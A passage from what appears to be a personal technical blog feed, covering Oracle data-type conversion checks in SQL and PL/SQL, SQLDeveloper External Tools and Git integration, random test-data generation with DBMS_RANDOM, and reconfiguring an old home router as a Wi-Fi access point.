    19901112                       12-NOV-90 00.00.00.000000000 EUROPE/LONDON        
    30-JUN-1997                    30-JUN-97 00.00.00.000000000 EUROPE/LONDON        
    06/29/2007                     29-JUN-07 00.00.00.000000000 EUROPE/LONDON        
    
    7 rows selected. 
    

    To be honest, I think I’d prefer the first option if I had a choice.
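
    Whichever you choose, the same function can then act as a filter in the load itself so that only rows which will convert cleanly are picked up. As a sketch ( not part of the original load, and only catching rows in the one timestamp format) :

    insert into historic_events( id, event_desc, event_ts)
        select to_number( id),
            event_desc,
            to_timestamp_tz( event_ts, 'MON DD YYYY HH24:MI:SS TZR')
        from historic_events_stg
        where validate_conversion( id as number) = 1
        and validate_conversion( event_ts as timestamp with time zone, 'MON DD YYYY HH24:MI:SS TZR') = 1;
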
    If you’re not on 12c yet, all of this is somewhat academic. If you want to take advantage of similar functionality, you’re going to have to roll-your-own…

    The sort-of Validate Conversion function

    Using the documentation for the VALIDATE_CONVERSION function as a rough guide, we can come up with something reasonably serviceable in PL/SQL :

    create or replace function is_valid_conversion(
        i_expr in varchar2,
        i_target_type in varchar2,
        i_format in varchar2 default null)
        return pls_integer deterministic
    is
    
    --
    -- Mimic the VALIDATE_CONVERSION function that's available in 12c and above.
    -- NOTE - setting of NLS params specifically excluded here.
    -- This function simply works against the base data types i.e. :
    -- NUMBER
    -- DATE
    -- TIMESTAMP
    -- TIMESTAMP WITH TIME ZONE
    -- This should cover most of the common use-cases for this function.
    
        dummy_date date;
        dummy_num number;
        dummy_ts timestamp;
        dummy_tstz timestamp with time zone;
        
        l_type varchar2(30);
        l_format varchar2(50);
        
        e_missing_type exception;
        e_unsupported_type exception;
    begin
        -- Sanity check the input parameters
        if i_target_type is null then
            raise e_missing_type;
        elsif upper( i_target_type) not in ('NUMBER', 'DATE', 'TIMESTAMP', 'TIMESTAMP WITH TIME ZONE')
        then
            raise e_unsupported_type;
        end if;
        
        if i_expr is null then
            -- will convert to any of the data types we're dealing with here
            return 1;
        end if;
        l_type := upper( i_target_type);
        -- Now test the conversion
        if l_type = 'NUMBER' then
            if i_format is not null then
                dummy_num := to_number( i_expr, i_format);
            else
                dummy_num := to_number(i_expr);
            end if;
        elsif l_type = 'DATE' then
            l_format := coalesce( i_format, sys_context('userenv', 'nls_date_format'));
            dummy_date := to_date( i_expr, l_format);
        elsif l_type = 'TIMESTAMP' then
            l_format := coalesce( i_format, sys_context('userenv', 'nls_timestamp_format'));
            dummy_ts := to_timestamp( i_expr, l_format);
        elsif l_type = 'TIMESTAMP WITH TIME ZONE' then
            select coalesce( i_format, value)
            into l_format
            from v$nls_parameters
            where parameter = 'NLS_TIMESTAMP_TZ_FORMAT';
            
        dummy_tstz := to_timestamp_tz( i_expr, l_format);
        end if;
        
        return 1;
    exception 
        when e_missing_type then 
            raise_application_error(-20000, 'A type to convert to must be specified');
        when e_unsupported_type then
            raise_application_error(-20001, q'[Target type is not supported by this function. You haven't written that bit yet !]');
        when others then
            -- conversion has failed
            return 0;
    end is_valid_conversion;
    /
    

    Sure enough, when you run this, the results are the same :

    select id, 
        is_valid_conversion( id, 'NUMBER') as isnum
    from historic_events_stg;
    
    ID  ISNUM
    --- -----
    ONE     0
    2       1
    3       1
    4       1
    5       1
    6       1
    7       1
    
    select event_ts, 
        is_valid_conversion(event_ts, 'DATE') as isdate
    from historic_events_stg; 
    
    EVENT_TS                  ISDATE
    ------------------------- ------
    April 14 1828                  0
    DEC-17-1903                    0
    5 July 1948                    1
    July 20 1969 20:17:40 UTC      0
    19901112                       0
    30-JUN-1997                    1
    06/29/2007                     0
    
    select event_ts, 
        is_valid_conversion(event_ts, 'DATE', 'MON-DD-YYYY') as isdate
    from historic_events_stg; 
    
    EVENT_TS                           ISDATE
    ------------------------------ ----------
    April 14 1828                           1
    DEC-17-1903                             1
    5 July 1948                             0
    July 20 1969 20:17:40 UTC               0
    19901112                                0
    30-JUN-1997                             0
    06/29/2007                              0
     
    
    select event_ts,
        is_valid_conversion(event_ts, 'TIMESTAMP WITH TIME ZONE') as is_tstz
    from historic_events_stg
    where id = '4';
    
    EVENT_TS                          IS_TSTZ
    ------------------------------ ----------
    July 20 1969 20:17:40 UTC               1
    

    Of course, this is no substitute for a built-in SQL function in terms of both functionality and performance. However, it may provide the basis of something useful if you’re not in a position to play with all those 12c goodies just yet.

    Configuring External Tools in SQLDeveloper

    Tue, 2019-11-19 14:51

    In order to distract myself from the lunacy that is the ongoing UK General Election campaign, I’ve been continuing to spend some quality time with the Swiss Army Knife of the Oracle world, SQLDeveloper.
    I know, conventional wisdom says that when you have a hammer, everything is a nail.
    On the other hand, conventional wisdom is rather less forthcoming if instead you have a multi-tool of Central European origin.
    Fortunately, SQLDeveloper pays no heed to conventional wisdom but allows you to configure callouts to other useful software utilities by means of its External Tools functionality.
    What we’re going to look at here is :

    • Adding a call to an external tool in SQLDeveloper
    • Using macros to control the behaviour of an External Tool
    • Configuration settings for common tools in Windows
    • Configuration settings for common tools in Ubuntu

    Setup External Tools

    In the Tools menu, select External Tools.
    If you’re on Windows, you can kick-start matters by clicking the Find Tools button.
    This will configure :

    • Notepad
    • Internet Explorer
    • Word (if available)

    This option is not available on Ubuntu, which is where I am at the moment so…

    Adding a new tool

    I’m going to start with the equivalent to Notepad on Ubuntu.
    I feel I should apologise to the noble Gedit for that last sentence.
    From the Tools menu select External Tools :

    Click New.

    Now we need to enter the location of the program we want to run. As we’re on Linux, we can find this out easily enough :

    which gedit
    /usr/bin/gedit
    

    If we have a file in focus when we call this editor we’d like Gedit to open it. We’d also like it to use the directory in which that file is located.
    We can achieve this using some of the macros available to us. In the Argument field, click Insert. Now click on File Name :

    Click OK and we can see that the field now has a value of :

    ${file.name}
    

    We’re going to use a macro for the Run Directory as well. In this case we’ll select the File Directory macro which gives us a Run Directory value of

    ${file.dir}
    

    After all that the dialog looks like this :

    Click Next

    Next we can configure how the tool is displayed in SQLDeveloper. We’ll leave the caption as is. We’ll add a tooltip though.
    Oh, and the icon is currently set to the SQLDeveloper default for External Tools.
    On Windows, SQLDeveloper is usually smart enough to derive the appropriate icon from a fully qualified path to the executable. On Ubuntu, we need to point it in the right direction.
    We also need to be a bit careful about the size of the icon file we choose otherwise SQLDeveloper will complain with something like :

    Fortunately, Ubuntu tends to put suitably sized icons for its applications in :

    /usr/share/icons/gnome/16x16/apps
    

    …less fortunately, the one for Gedit isn’t called gedit.png. Anyhow, what we end up with is :

    Next, we want to determine where Gedit will be available.
    As well as the main Tools menu, we’d like it to be on the context menus and the main toolbar.
    We don’t want to log output messages :

    I’m going to leave the Availability settings at the default :

    Finally click Finish, then close the External Tools window.

    Now, if I have a file in focus, I can open it in Gedit :

    Macro Definitions

    In addition to External Tool configuration, these macros can be used elsewhere in SQLDeveloper to configure various preferences. For example, to set your Worksheet default path to be the same directory as the file that you have open at any point in time, you’d use

    "${file.dir}"
    

    You can get an idea of the value of certain macros when you select them in the External Tool setup dialog:

    The complete list of macros (at least, all of those available in the External Tool config dialog) is :

    Macro                         Syntax                   Description
    ----------------------------- ------------------------ ------------------------------------------------------------------
    DB Connection String          ${sqldev.conn}           Database Connection String
    DB UserName                   ${sqldev.dbuser}         Database username
    Environment Variable          ${env:var=PATH}          The value of an environment variable (var names the variable)
    File Directory                ${file.dir}              The directory containing the currently selected file
    File Extension                ${file.ext}              The extension of the currently selected file
    File Name                     ${file.name}             The name of the currently selected file
    File Name Without Extension   ${file.name.no_ext}      The basename of the currently selected file
    File Path                     ${file.path}             Full path of the currently selected file
    File URL                      ${file.url}              The URL of the currently selected file
    IDE Application Name          ${ide.name}              The name of this application
    IDE Classpath                 ${ide.classpath}         The full classpath of this application
    IDE Install Directory         ${ide.dir}               The directory in which this application is installed
    IDE Oracle Home Directory     ${ide.oracle.dir}        The Oracle home directory in which this application is installed
    IDE User Directory            ${ide.user.dir}          The user directory
    Prompt                        ${prompt}                Displays a prompt at runtime so the user can supply an argument value
    Prompt with Label             ${promptl:=prompt text}  Prompts the user for a value (label specifies the prompt text)
    System Property               ${prop:name=property}    The value of a system property (name names the property)

    Configuration details for common Windows tools

    Here’s a list of configurations that work for me on Windows 10.
    There are a couple of things that may help on Windows when looking for the information required to configure an external tool.
    First, if you’re unsure of the location of the executable you need to run, you can simply run it and then open Task Manager and right-click it. This will give you the exe name and path.
    Second, whilst executables that are in your path do not require a fully qualified path name for SQLDeveloper to find them, you will usually need the full path if you want SQLDeveloper to pick up the normal icon for that program.

    • Windows Explorer : Executable C:\Windows\explorer.exe ; Arguments /select,${file.path}
    • Notepad++ : Executable C:\Program Files(x86)\Notepad++\notepad++.exe ; Arguments ${file.path} ; Run Directory ${file.dir}
    • Git Bash : Executable C:\Program Files\Git\git-bash.exe ; Run Directory ${file.dir}
    • Putty : Executable C:\Program Files(x86)\PUTTY\putty.exe
    • Excel : Executable C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE ; Arguments ${file.path} ; Run Directory ${file.dir}
    • FileZilla : Executable C:\Program Files\FileZilla FTP Client\filezilla.exe ; Arguments "-a ${file.path}"
    • Snipping Tool : Executable C:\Windows\system32\SnippingTool.exe ; Icon ide.fileicon.file:/C:/Windows/system32/SnippingTool.exe
    • Notepad : Executable notepad.exe ; Arguments ${file.path} ; Run Directory ${file.dir} ; Icon ide.fileicon.file:/C:/Windows/system32/notepad.exe

    Configuration details for common Ubuntu tools

    Things are slightly different on Ubuntu. No, I’m not about to go into a chauvinistic rant about the innate superiority of life with the Penguins, although I’ve not included Git Bash in this list because Ubuntu has proper Bash…

    • Nautilus : Executable /usr/bin/nautilus ; Arguments ${file.dir} ; Icon /usr/share/icons/gnome/16x16/apps/file-manager.png
    • Gedit : Executable /usr/bin/gedit ; Arguments ${file.name} ; Run Directory ${file.dir} ; Icon /usr/share/icons/gnome/16x16/apps/accessories-text-editor.png
    • Terminal : Executable /usr/bin/gnome-terminal ; Run Directory ${file.dir} ; Icon /usr/share/icons/gnome/16x16/apps/gnome-terminal.png
    • LibreOffice Calc : Executable /usr/bin/libreoffice ; Arguments --calc ${file.name} ; Run Directory ${file.dir} ; Icon /usr/share/icons/gnome/16x16/apps/calc.png
    • FileZilla : Executable /usr/bin/filezilla ; Arguments "-a ${file.path}" ; Icon /usr/share/filezilla/resources/16x16/filezilla.png
    • VS Code : Executable /usr/bin/code ; Arguments ${file.name} ; Run Directory ${file.dir}
    • Screenshot : Executable /usr/bin/gnome-screenshot ; Icon /usr/share/icons/gnome/16x16/apps/applets-screenshooter.png

    Note that I couldn’t find an appropriately sized icon for VS Code.

    Well that’s used up some time, but there’s still a month to go until the election. I’ll have to find something else to distract myself with.

    Using Git in SQLDeveloper

    Wed, 2019-11-06 14:09

    As I write, South Africa have just emerged victorious from the 2019 version of the Rugby World Cup having vanquished England in the final.
    This explains both the code used in the examples that follow and the fact that I’m writing this to escape from the “commiserations” pouring into my phone from my Welsh In-Laws. Tell me, what is the Welsh for Schadenfreude ?
    Continuing my SQLDeveloper appreciation fest, I’m going to look at the level of Git integration in the latest version of SQLDeveloper (19.2).
    Specifically, what I’ll be covering is :

    • Using the SQLDeveloper Files Tree to work with a local Git Repository
    • Creating a branch
    • Staging changes
    • Committing changes
    • Comparing different versions of a file within a branch
    • Comparing branches
    • Merging branches
    • Deleting branches

    We’re going to do all of this without leaving the comfort of our favourite Oracle IDE…

    Environment

    Running SQLDeveloper 19.2, we’ll be working on a local Git repository using Git 2.7.4.
    I’m doing this on Ubuntu but SQLDeveloper seems to behave in the same way on Windows. I haven’t had the chance to do any comparison on MacOS but I’ve no reason to believe it won’t be the same story there too.

    Changing your perspective

    By default, SQLDeveloper views the world through objects in the database :

    Fortunately, it can also be persuaded to look at Files on your computer.
    To achieve this, simply go to the View menu and select Files :

    If you start exploring this view, you may well find that you’re seeing spots in front of your eyes :

    Don’t worry, it’s not contagious. It’s just SQLDeveloper realising that this directory is actually a local Git repository (repo).
    We can find out the branch that is currently active by right-clicking any member of the repo and selecting Versioning/Properties.
    In this case, we can see that we’re on master :

    We want to make some changes to this application code, and we’d like to do that work on a separate branch, so…

    Creating a new branch

    Right-click on one of the repo members and select Versioning/Create Branch :

    Enter the name you want to give the new branch – in my case, find_winners.
    Then click Select Commit and choose the commit from which you want to branch. For me it’s usually the latest one, which is just as well in this case :

    I want to switch to the new branch as soon as it’s created so I need to check Checkout Created Branch :

    Click OK and I’m now in the new branch. To check, I just look at the properties window of one of the repo members again ( in my case it’s the rwc root folder) :

    I’m going to edit the package header file because I want a function to tell me who the winners were for a given tournament :

    create or replace package save_finals as
    
        function get_winners( i_year rwc_finals.year%type)
            return countries.country_name%type;
    
        procedure add( i_year rwc_finals.year%type, i_host rwc_finals.host_cid%type, 
            i_team1 rwc_finals.team1%type, i_team2 rwc_finals.team2%type);
            
        procedure result( i_year rwc_finals.year%type, 
            i_t1_score rwc_finals.t1_score%type,
            i_t2_score rwc_finals.t2_score%type);
    end save_finals;
    /
    

    I can see that the icon for the changed file is now different in the File Tree :

    Furthermore, if I want to see what has changed since the last Git checkin, I can simply click on the History tab in the code editor and select the last Git checkin:

    Whilst I’m here, I’d like to add another view to my application, so I’m going to create a new file for it :

    create or replace view roll_of_honour_vw as
        select year, save_finals.get_winners(year) as champions
        from rwc_finals
    /    
    

    Now I’ve saved the file, I can see that it has a different icon in the Files Tree :

    Right, I want to start saving my changes to Git. First up then…

    Staging changes

    Now, it is possible to stage your files one-at-a-time by right-clicking the file and selecting Versioning/Add.

    However, if you select Add All instead, you get a list of all candidates for staging and you can then remove any files you don’t want using the Select checkbox.

    When you’re happy with your selection, hit OK

    We can now see that the file icons have changed again. The edited files ( save_finals.pks and save_finals.pkb) now have a green spot, whilst the newly created roll_of_honour_vw.sql now has a big plus icon :

    Incidentally, if you have a file in the tree that you don’t want git to manage, you can add it to the .gitignore file from the same menu.

    For example, I’ve added a todo list so I can keep track of what I’ve still got to write ( I can’t quite afford JIRA at the moment)

    If I right-click on the file and select Versioning/Add to .gitignore, I’ll get :

    Once I’m happy with my selections, I hit OK and the file icon changes :

    Committing changes

    The process for committing changes is similar to staging them. Right-click a repo member and select Versioning/Commit All…

    Note that we could include non-staged files in the commit by checking Commit non-staged files.
    Finally, we add an appropriate commit message :


    Just as SQLDeveloper will allow you to compare the saved version of a file with the last committed version in the repo, you can also compare the file from two different commits :

    If we open save_finals.pkb and switch to the History tab, we can Filter to view only Git commits :

    If we now select the previous Git checkin, we can see what’s changed :

    Alternatively, you can achieve a similar effect by right-clicking the file then selecting Versioning/Version History.

    Comparing branches

    SQLDeveloper will even allow you to compare different branches.
    First, you need to go to the Team menu and select Git/Branch Compare

    Remember, we’re on the find_winners branch so we need to select the master branch from the drop-down :

    You can compare the versions of a file in each branch by right-clicking on the file and selecting Compare :

    Merging branches

    We’ve finished our enhancement and we’re happy with it. It’s now time to merge the changes back into master.
    Before we get to merging, we need to switch to the branch that we want to merge to ( in this case, master).

    So, from the Team menu, select Git/Checkout

    Now click Select Branch and choose the branch we want to switch to ( in our case, master) :

    Finally, hit the OK button and we’re on master.

    Next we need to go back to the Team menu and select Git/Merge

    Select the branch you’re merging from and select a commit…

    The merge Window now looks something like this :

    Hit OK

    If we now look at the Commit History ( Team/Git/Commit History…) we can see that the latest commit matches the one that we selected to merge :

    We can also see the list of files that formed a commit by selecting it in the history pane:

    Deleting the branch

    Now we’ve finished with the branch, let’s do a bit of tidying up.

    From the Team menu, select Versions. This will bring up the Versions pane.
    Here, we can expand the Git node until we can see our local branches :

    The current branch has a green icon.

    To delete the find_winners branch, we simply select it in the tree and then click the big red cross :

    …and it’s gone.

    References

    Everything I’ve covered here involves using a local repository.
    Blaine Carter’s Using Git with Oracle SQL Developer video includes steps to connect to a remote repository.

    Galo Balda has also written a series of posts on using Git with SQLDeveloper. You can find them here.

    Oracle and Alternative Facts – generating test data with DBMS_RANDOM

    Tue, 2019-10-01 15:55

    There’s a bug in DBMS_RANDOM.VALUE. It consistently fails to return the correct set of lottery numbers.
    On the plus side, it is surprisingly useful when you find yourself in a situation which is all too common for a Data Warehouse developer.
    There’s a requirement for a new feed into your Warehouse from another system. You’ve managed to agree the file specification – what data will be included in the file, datatypes etc, but the developers working on the upstream system won’t be able to start providing test files for loading for weeks yet. Meanwhile, you need to start writing your code to ingest the feed.
    Fortunately, you have all the tools available to :

    • Generate lots of rows of test data
    • Generate random values for strings, numbers and dates
    • Use a set of pre-defined values randomly in your data generation

    First of all, let’s take a look at…

    The Feed File specification

    The file will contain records with the following attributes :

    • first_name – string
    • last_name – string
    • email – string
    • phone_number – string
    • hire_date – date
    • job_id – string
    • salary – float
    • commission_pct – float
    • manager_id – integer
    • department_id – integer

    Yes, it does look rather familiar. It is, in fact, a new feed into the HR.EMPLOYEES table.

    Generating lots of rows

    This is one of those tricks that are easy when you know how, but may leave you scratching your head the first time you see it. Here’s how to generate lots of rows using a single query against DUAL in Oracle :

    select rownum
    from dual
    connect by level <= 1000
    

    Yep, a thousand rows of data (or 10000, or a million), very quickly and with little typing.
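
    If you need a really large volume – say, a million rows – a single CONNECT BY of that size can start to chew through session memory, so one common workaround (just a sketch, and by no means the only approach) is to cross-join two smaller row generators :

    -- 1000 x 1000 = a million rows
    select rownum
    from (select 1 from dual connect by level <= 1000),
         (select 1 from dual connect by level <= 1000);
    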
    Of course, we’re going to need more than just a single column of integers to build our test data file. Fortunately, DBMS_RANDOM does have a few tricks up its sleeve…

    Think of a number

    When it comes to generating a random integer, you may first be tempted to do something like this :

    select dbms_random.random
    from dual; 
    

    This is a reasonable start but there are a few drawbacks with DBMS_RANDOM.RANDOM, namely :

    • you can’t control the range of numbers between which the result will fall
    • this function is deprecated in later versions of Oracle

    On the face of it, DBMS_RANDOM.VALUE also has its issues. Passing in the minimum and maximum permissible values does offer control over the range of the result. However, a decimal value is returned :

    select dbms_random.value(1,59)
    from dual; 
    

    Fortunately, it’s a SQL function which means that you can use other SQL functions to offer greater control over the output :

    select trunc(dbms_random.value(1,59))
    from dual;
    

    This technique also applies when you want to generate a decimal to a set precision – e.g. :

    select round(dbms_random.value(100, 900), 2)
    from dual;
    

    It’s worth noting that the function returns a value greater than or equal to the lower bound value but less than the upper bound value. Therefore, if you want the possibility of including the maximum value in the result set you’ll need to add one to the maximum value you pass into the function :

    select trunc(dbms_random.value(1,60)) -- lottery numbers now go up to 59 !
    from dual;
    
    Dates to remember

    Generating random dates is a bit more involved. However, remember that dates are really just numbers underneath it all…

    select to_char(sysdate, 'J')
    from dual;
    

    The result is the number of days since 1st January 4712 BC.

    This means that we can perform mathematical operations on dates in the same way as numbers. Throw in a bit of randomness and we can generate random dates. For example, if we want to generate a date somewhere in the last decade…

     
    select to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1, 3652)), 'J') -- 3652 days in the last 10 years
    from dual;
    

    As we’re dealing with whole days here, the dates generated from this query all have the time element set to midnight…

    alter session set nls_date_format = 'DD-MON-YYYY HH24:MI:SS';
    select to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1, 3652)), 'J') -- 3652 days in the last 10 years
    from dual;
    
    
    TO_DATE(TO_CHAR(SYSD
    --------------------
    08-MAY-2015 00:00:00
    
    
    

    …but with a bit more jiggery-pokery, we can persuade DBMS_RANDOM to cough up a proper timestamp. Note that there are 86400 seconds in a day so…

    select 
        to_date( 
            to_char( sysdate, 'J') 
                - trunc( dbms_random.value( 1, 3652))
        , 'J')
                + trunc(dbms_random.value(1,86400))/86400
    from dual;
    
    TO_DATE(TO_CHAR(SYSD
    --------------------
    29-MAY-2010 02:57:00
    
    
    Stringing things together

    DBMS_RANDOM has one more neat trick up its sleeve – the ability to generate character strings of a defined length…

    select dbms_random.string('u', 20) as uppercase,
        dbms_random.string('l', 20) as lowercase,
        dbms_random.string('a', 20) as mixedcase,
        dbms_random.string('x', 20) as upper_alphanum,
        dbms_random.string('p', 20) as printable
    from dual;
    
    UPPERCASE            LOWERCASE            MIXEDCASE            UPPER_ALPHANUM       PRINTABLE           
    -------------------- -------------------- -------------------- -------------------- --------------------
    UIASUAOOHMJMCDBFMLTP xmscwbcyzfzukhnwrihj YmPMxDQHOMwrFxXiUGio 8ICORVCRGCLX62VVJ185 :#h(1HHjH1[wqZ$7[\!H
    
    

    The first parameter specifies the character set from which the string should be built ( uppercase alpha, lowercase alpha etc).
    The second parameter specifies the length of the string.
    Of course, if you wanted to mix things up a bit in terms of the length of string returned, you can always pass a random number as the string length…

    select dbms_random.string('u', trunc(dbms_random.value(1,21))) as stringy
    from dual
    connect by level <= 5
    /
    
    STRINGY             
    --------------------
    ZWPPBZ              
    URLBDIEQMHPAIMPWPML 
    DCQSOMB             
    WJLFIATWSSXTIHAXLPH 
    MIXTEQQIDNZZSQVVI   
    
    
    Randomly selecting valid values

    Whilst we could make an attempt at generating a test file simply using the techniques we’ve looked at so far, we know that this will only get us so far.
    The ultimate destination for the records in the file is the EMPLOYEES table, which has Foreign Keys to both JOBS (JOB_ID) and DEPARTMENTS (DEPARTMENT_ID).
    Whilst we could simply hard-code values to ensure that they are valid, we could get a little more creative and make a random selection.
    In the event, I’ve decided to do both.
    I’ll hard-code the JOB_ID to be “IT_PROG” because, let’s face it, you can never have enough programmers.

    That leaves us with DEPARTMENT_ID and MANAGER_ID, which we can get from the DEPARTMENTS table. We want to select random values from this table. Now, before we go any further, it’s probably worth considering this seemingly innocuous query :

    with some_values as (select rownum as id from dual connect by level <=5)
    select id
    from some_values
    where id = trunc(dbms_random.value(1,6))
    /
    

    If you execute this a few times, you’ll start to see something rather strange. The query will sometimes return no rows at all, and sometimes more than one row. This is because DBMS_RANDOM.VALUE is evaluated afresh for each row that the predicate is tested against, so every row is being compared with a different random number.
    The reason for this behaviour is explained in more detail by Mr Kyte himself here.

    This means that we need to take an alternative approach to selecting our random DEPARTMENTS records.
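
    As an aside, if all you need is a single random row – rather than a random value for every row you’re generating – then, assuming you’re on 12c or later for the row-limiting clause, you can simply sort by a random value and take the top row :

    select department_id, manager_id
    from departments
    order by dbms_random.value
    fetch first 1 row only;
    

    For our feed file, however, we need a random department for each generated employee record, so we want something we can join to.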

    First of all, we’ll need to fetch a set of unique records from the table. As it’s a small table, we may as well get all of them. Although they already have a synthetic key, we’ll want to give them an additional one for reasons which will shortly become apparent…

    select rownum as id, department_id, manager_id
    from departments
    /
    
    
            ID DEPARTMENT_ID MANAGER_ID
    ---------- ------------- ----------
             1            10        200
             2            20        201
             3            30        114
             4            40        203
             5            50        121
             6            60        103
             7            70        204
             8            80        145
             9            90        100
            10           100        108
            11           110        205
            12           120           
            13           130           
            14           140           
            15           150           
            16           160           
            17           170           
            18           180           
            19           190           
            20           200           
            21           210           
            22           220           
            23           230           
            24           240           
            25           250           
            26           260           
            27           270           
    
    27 rows selected. 
    
    

    We’ll need to know how many records we have in the result set so that we can set the maximum value we want to select from when we randomly pick our record.
    So, our query now evolves :

    with dept as ( 
        select rownum as id, department_id, manager_id
        from departments)
    select max(id) from dept
    /
    
       MAX(ID)
    ----------
            27
    
    

    Using this second query as an in-line view, we can use the record count to seed a randomly generated key in another in-line view, which we can then use to join back to the DEPARTMENTS records :

    with dept as (select rownum as id, department_id, manager_id from departments),
        dept_count as (select max(id) as num_depts from dept),
        -- The main query that generates most of the data
        emp as (
            select 
                dbms_random.string('u', trunc(dbms_random.value(1,22))) as  first_name,
                dbms_random.string('u',trunc(dbms_random.value(1,22))) as last_name,
                dbms_random.string('l',trunc(dbms_random.value(10,27))) as email,
                -- use hard-coded value or null 50/50 chance
                case when mod(trunc(dbms_random.value(1,11)),2) = 0 then null else '555.123.4567' end as phone_number, 
                to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1,3652)), 'J') as hire_date,
                trunc(dbms_random.value( 1000, 3500)) as salary,
                case when mod(trunc(dbms_random.value(1,11)), 5) = 0 then trunc(dbms_random.value( 0,20)) end as commission_pct,
                -- value to use as a key to join onto the dept ilv
                trunc(dbms_random.value(1, dept_count.num_depts +1)) as dept_key,
                'IT_PROG' as job_id -- hard-coded for every record - ensure it's valid this time around.
            from dual, dept_count
            connect by level <= 10)
        select 
            emp.first_name,
            emp.last_name,
            emp.email,
            emp.phone_number,
            emp.hire_date,
            emp.salary,
            emp.commission_pct,
            dept.department_id,
            dept.manager_id,
            emp.job_id
        from emp
        inner join dept 
            on emp.dept_key = dept.id
    /
    

    The output is suitably, well, random :

    Of course, if you want to delimit the file and are using SQLDeveloper or SQLcl, you can simply do something like…

    set sqlformat loader
    

    …and your query output will be pipe delimited automagically.
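
    Putting it together, a minimal SQLcl sketch for spooling the generated data to a feed file might look something like this ( the file and script names here are just placeholders) :

    set sqlformat loader
    set feedback off
    spool employees_feed.dat
    -- the data-generation query from above, saved as gen_employees.sql
    @gen_employees.sql
    spool off
    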

    Extending the range of my Home Network Wi-fi by converting an old router into a Wireless Access Point

    Mon, 2019-09-02 08:11

    The ongoing Ashes series appears to have become all about comebacks.
    First of all we had Steve Smith, in his first test since the end of his Sandpaper-gate ban essaying one of the great feats of sporting redemption.
    Then we had Ben Stokes dragging England to a preposterous victory target of 359 having been skittled for 67 in their first innings.

    Making a rather more modest comeback in this post is an old EE Bright Box 1 router, which has been gathering dust since I got a replacement a couple of years ago.

    What follows is one way to adapt this old piece of kit to extend the WiFi range on a current home network.
    I want to do this by creating an additional Wireless Access Point positioned away from the main router.

    A Typical Home Area Network

    A Home Area Network (HAN) usually consists of a Router that acts as a single gateway for connection to the internet.
    All the devices in the home will connect to the router and therefore get access to the internet, as well as other devices in the HAN.
    Within the HAN, the router will hand out a unique IP address to each device as it connects using the standard Dynamic Host Configuration Protocol (DHCP).
    The DHCP allocated IP addresses are normally somewhere in the range of 192.168.1.1 to 192.168.1.255 (although the start and end addresses of the range will vary).

    Powerline Adapters

    Creating a second wireless access point to your network can be a fairly low-tech, low-cost approach to utilising your old router.
    Essentially, you need to connect it to the main router via an ethernet (network) cable then place it somewhere where your wireless signal isn’t so great. This, in itself, might not seem very practical unless you have a very long network cable.
    Alternatively, you can use a simple Powerline Adapter.
    You actually need two adapters. The first is plugged into a power socket near the main router and connected to it via a network cable.
    The second can then be plugged into any socket on the same electrical circuit.
    You can then connect the old router to the second adapter via a (shorter) network cable. Devices will then be able to connect to the network wirelessly simply by selecting the second router as their wireless access point.

    Information required from your main router

    Once we’re finished, our main router will regard our Bright Box as simply another device attached to the LAN. However, we’ll need to give the Bright Box a fixed IP address that doesn’t conflict with any other connected device.

    To determine what your options are, you’ll need to check the settings on your main router to establish the range of possible DHCP addresses it uses.
    To do this, you need to go to the Router’s admin page.

    In the unlikely event that your Router is using this entire address range to allocate IP addresses to devices connecting to the network, you will need to change it.
    In my case, my Router’s DHCP settings are to assign addresses starting at 192.168.1.64, so I know that choosing an address outside of that for my Bright Box (e.g. 192.168.1.10) should be safe.

    This is something I’ll come back to in a bit. First though…

    Accessing the Admin Page on the Bright Box

    To start playing around with the configuration of the router, you need to be able to access its admin pages.
    In the case of my Bright Box 1, the admin address and login details are included on a sticker on the underside of the router.
    The address for the admin screen is :

    http://192.168.1.1
    

    At this point, I don’t want to have the Bright Box connected to the main network, I just need to note the Wireless Network Name (SSID) on the sticker and connect to that network once it’s switched on.
    In my case the Bright Box’s Network name is currently set to EE-BrightBox-qq5xjw.

    Once I connect to this network, I can visit the admin page in the browser :

    …and check/change the wireless password as required :

    Remember, at this point, the Bright Box is on a completely separate network to the main router.

    Backing up the existing Router config

    Before I start changing stuff, I want to make sure that I can get back to a known working configuration – i.e. the one currently in place on the Bright Box.
    Like most routers, it has the option to backup this setting.
    On the Bright Box admin site, I need to go to Advanced/Tools/Configuration/Backup :

    By clicking on the Backup button, I can choose the location to save a file called backup.bin which I can use to restore my router settings to what they are currently should I need to.

    Once that’s done, we can move onto…

    Performing a Factory Reset

    Whilst you can do this via the reset button on the back of the Bright Box, I chose instead to use the Router’s Admin application.
    Navigating to Advanced/Tools/Factory Default, we bring up :

    Clicking the button results in :

    As we’ve already backed up the router configuration, we’re happy to proceed.

    We’ll then have to wait for the reset to complete. In the meantime, we’ll get a screen like this :

    Perhaps unsurprisingly, the router will kick you off the admin site once the reset is complete. However, you can verify the changes by reconnecting and looking at Basic/Broadband Settings :

    Re-configuring the Bright Box as a Wireless Access Point

    To start with, we need to navigate to Basic/Broadband Settings and set :

    • Broadband Type : Fibre/Ethernet
    • Protocol: Bridging

    …and then hit Save Settings.

    Next, we go to Advanced/DHCP. Here is where we specify a static address for the Bright Box ensuring that it is outside of the DHCP range of the main router:

    Gateway IP Address : 192.168.1.10

    We also disable the Bright Box’s own internal DHCP functionality :
    DHCP Server : Disable

    Next, we want to disable Network Address Translation (NAT) on the Bright Box as we’re just using it to pass traffic through to the main router.
    Select NAT from the left-hand menu and set :

    NAT module function : Disable

    The next two steps are optional.
    Firstly, I want to change the Network Name (SSID) that the Bright Box broadcasts.
    To do this, I need to go to Wireless Settings/SSID Management and set :

    Wireless Network Name(SSID) : mike1

    The second of the optional steps is specific to the Bright Box.
    The default password for this router is not very secure – you can check this article for details – so I’m going to change it.
    To do this, I need to go to Basic/Wireless Settings :

    OK, so you might want to pick a slightly more secure password than this, but you get the idea.

    Finally, click Save Settings.

    Once all this is done, we need to power down the Bright Box and then connect the Ethernet cable from the Powerline Adapter to the WAN port (LAN 4) on it.

    Now we can power up the Bright Box once more and check the effect of our changes :

    Testing the new configuration

    Once the Bright Box is up and running again, the first thing we should notice is that we have a new entry in our list of available wifi networks. For example, if I check this on my Ubuntu laptop by running…

    nmcli dev wifi
    

    I can connect to this new access point using the password we set during the configuration steps we’ve just completed :

    Thus connected, I can now access the internet in the normal way :

    …and still have time to get comfortable before David Warner’s now inevitable double-hundred at Old Trafford.

    VirtualBox – running a Windows 10 Guest on an Ubuntu Host

    Fri, 2019-08-02 10:02

